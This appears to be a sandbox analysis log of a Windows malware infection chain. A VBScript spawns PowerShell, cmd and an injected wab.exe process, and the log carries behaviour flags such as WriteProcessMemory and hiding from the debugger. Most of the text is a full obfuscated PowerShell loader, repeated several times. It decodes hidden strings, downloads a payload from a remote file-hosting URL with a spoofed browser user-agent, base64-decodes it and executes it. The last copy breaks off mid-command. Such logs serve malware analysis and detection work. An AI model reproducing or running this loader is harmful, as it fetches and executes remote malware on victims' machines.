eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
3⤵
PID:2192

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
4⤵
PID:2520

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\download.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
3⤵
PID:932

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC 